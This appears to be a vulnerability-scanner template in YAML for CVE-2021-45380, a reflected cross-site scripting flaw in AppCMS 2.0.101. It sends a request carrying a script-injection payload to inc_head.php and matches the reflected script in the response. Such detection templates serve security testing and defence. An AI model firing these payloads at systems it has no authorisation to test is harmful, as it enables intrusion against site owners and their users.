32 lines
714 B
YAML
32 lines
714 B
YAML
|
id: CVE-2021-45380
|
||
|
|
||
|
info:
|
||
|
name: AppCMS - Reflected Cross-Site Scripting (XSS)
|
||
|
author: pikpikcu
|
||
|
severity: medium
|
||
|
description: AppCMS 2.0.101 has a XSS injection vulnerability in \templates\m\inc_head.php
|
||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-45380
|
||
|
tags: cve,cve2021,appcms,xss
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/templates/m/inc_head.php?q="><script>alert(1337)</script>'
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
words:
|
||
|
- '<script>alert(1337)</script>'
|
||
|
part: body
|
||
|
condition: and
|
||
|
|
||
|
- type: word
|
||
|
part: header
|
||
|
words:
|
||
|
- text/html
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|